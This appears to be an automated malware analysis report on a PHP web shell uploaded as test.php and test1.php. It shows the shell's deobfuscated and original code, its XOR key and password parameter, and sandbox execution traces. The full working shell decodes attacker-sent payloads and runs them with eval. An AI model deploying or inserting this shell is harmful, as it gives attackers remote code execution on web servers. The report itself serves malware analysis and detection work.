PHP Malware Analysis
test.php, test1.php
md5: bcc90aaf24c6432b13a33510f617807d
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
- base64_decode (Deobfuscated, Original)
- base64_encode (Deobfuscated, Original)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
- eval (Deobfuscated, Original)
Input
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D, $K)
{
for ($i = 0; $i < strlen($D); $i++) {
$c = $K[$i + 1 & 15];
$D[$i] ^= $c;
}
return $D;
}
$pass = 'pass';
$payloadName = 'payload';
$key = '3c6e0b8a9c15224a';
if (isset($_POST[$pass])) {
$data = encode(base64_decode($_POST[$pass]), $key);
if (isset($_SESSION[$payloadName])) {
$payload = encode($_SESSION[$payloadName], $key);
if (strpos($payload, "getBasicsInfo") === false) {
$payload = encode($payload, $key);
}
eval($payload);
echo substr(md5($pass . $key), 0, 16);
echo base64_encode(encode(@run($data), $key));
echo substr(md5($pass . $key), 16);
} else {
if (strpos($data, "getBasicsInfo") !== false) {
$_SESSION[$payloadName] = encode($data, $key);
}
}
}Execution traces
data/traces/bcc90aaf24c6432b13a33510f617807d_trace-1676244854.8907.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:34:40.788506]
1 0 1 0.000184 393512
1 3 0 0.000288 405032 {main} 1 /var/www/html/uploads/test.php 0 0
2 4 0 0.000306 405032 session_start 0 /var/www/html/uploads/test.php 2 0
2 4 1 0.000360 405784
2 4 R TRUE
2 5 0 0.000376 405784 set_time_limit 0 /var/www/html/uploads/test.php 3 1 0
2 5 1 0.000392 405848
2 5 R FALSE
2 6 0 0.000405 405816 error_reporting 0 /var/www/html/uploads/test.php 4 1 0
2 6 1 0.000418 405856
2 6 R 0
1 A /var/www/html/uploads/test.php 12 $pass = 'pass'
1 A /var/www/html/uploads/test.php 13 $payloadName = 'payload'
1 A /var/www/html/uploads/test.php 14 $key = '3c6e0b8a9c15224a'
1 3 1 0.000466 405816
0.000492 316240
TRACE END [2023-02-12 21:34:40.788851]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:56:19.336792]
1 0 1 0.000158 393512
1 3 0 0.000258 405032 {main} 1 /var/www/html/uploads/test1.php 0 0
2 4 0 0.000275 405032 session_start 0 /var/www/html/uploads/test1.php 2 0
2 4 1 0.000331 405784
2 4 R TRUE
2 5 0 0.000348 405784 set_time_limit 0 /var/www/html/uploads/test1.php 3 1 0
2 5 1 0.000364 405848
2 5 R FALSE
2 6 0 0.000377 405816 error_reporting 0 /var/www/html/uploads/test1.php 4 1 0
2 6 1 0.000390 405856
2 6 R 0
1 A /var/www/html/uploads/test1.php 12 $pass = 'pass'
1 A /var/www/html/uploads/test1.php 13 $payloadName = 'payload'
1 A /var/www/html/uploads/test1.php 14 $key = '3c6e0b8a9c15224a'
1 3 1 0.000438 405816
0.000465 316240
TRACE END [2023-02-13 01:56:19.337130]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}